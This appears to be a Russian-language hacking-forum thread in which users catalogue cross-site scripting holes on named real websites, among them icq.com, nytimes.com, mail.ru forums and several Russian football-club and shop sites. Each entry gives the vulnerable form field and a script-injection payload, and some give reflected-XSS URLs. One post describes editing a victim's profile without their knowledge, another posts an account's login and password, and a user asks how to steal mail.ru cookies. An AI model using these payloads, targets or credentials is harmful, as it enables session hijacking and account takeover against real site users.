гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi Пишем сообщение уязвимое поле: Heimasíða
icq.com план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script> затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке http://icq.com/people/full_details_update.php вылетит куча алертов =) нужно "помочь" юзеру логиниться за ваш номер. либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше
Извеняюсь за повторение www.omen.ru <script>alert(\'Хss\')</script> уязвимые поля Ищу рост от: Ищу рост до: Ищу вес от: Ищу вес до:
www.26thavenue.com Регимся на форуме: Code: http://www.26thavenue.com/index.php?action=main.forums В профайле в поля Location, Interests пишем: Code: <script>alert("Antichat")</script>
Поковырял еще немного. Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject. Так же просто вставляем Code: <script>alert(/Xss/)</script> Потом еще при отправке сообщений - поля Link URL, Link Title. Code: "><script>alert()</script> Забил в гугл попробовал в нескольких местах, везде работает. Кроме этого есть пассивные XSS в этом движке, пример - Code: http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E или в другом месте - Code: http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
www.nytimes.com Ну собственно онлайн версия газеты нью йорк таймс Нужно имять статут зарегенного пользователя когда герегились постим коммент б блоге типа Code: <irame src=http://you.site.com/xss.html < ну и собстевенно создаем у себя страничку с названием xss.html содержашую Code: <script>alert(/XSS/)<script>
bronepoezd.ru в гостевой в поле сообщение пишем [.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img] без точек в бб теге
file.mail.ru narod.yandex.ru/disk/ заливаем файл со скриптом, который, при открытии файла, выполнится.
ehbsr.com не люблю я все таки американцев Нужно иметь статус зерегнного пользователя вот: User:birch64 password:ywrcws тыкаем мой аккаунт и в поле fist name втыкаем: Code: <img"""><script>alert(/ЛЯ ПА ПАМ/)</script>
Футбольный клуб "Москва" http://www.fcmoscow.ru/ru/registration Уязвимые поля: Фамилия Имя Отчество NickName Место Жительства В уязвимых полях пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Луч-Энергия" www.luch-energy.ru/?search Уязвимое поле: Ваш запрос В уязвимом поле пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Локомотив" http://www.fclm.ru/s-info-center/ Пишем: "><script>alert()</script> ------------------------------------------------------------------------ Футбольный клуб "Амкар" http://www.amkar.ru/reg/reg.asp Уязвимые поля: Логин Город Веб-Сайт В уязвимых полях пишем: "><script>alert()</script> Регестрируемся Заходим Вылетает Алерт
хостинг картинок http://images.i-files.org/ в поле описание пишем "><script>alert()</script> загружаем картинку, потом берем Ссылка на изображение: заходим по ссылке и вылетает алерт ------------------------------- "Знаменитый" украинский хотинг файлов upload.com.ua Заходим в аккаунт и создаем каталог с названием "><script>alert()</script> Получаем активную xss PS upload уже профиксили
http://ul-rocksite.info Переходит на страницу чата: http://ul-rocksite.info/index.php?page=chat И в чате рисуем следующее: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> OPera Версия 9.23
вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)
mail.ru http://forum.hi-tech.mail.ru/ уязвимо поле "Заголовок:" всеравно скоро прикроют, так что выкладываю - играйтесь)
Ты забыл про forum.auto.mail.ru а вапще если немного посмотреть на домена мейла..то можно найти ещё парочку форумов
DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.
Интернет-магазин бытовой техники и электроники http://www.003.ru/ При регистрации уязвимы поля Фамилия, Имя и Отчество "<script><alert('xss by megahertz')</script>
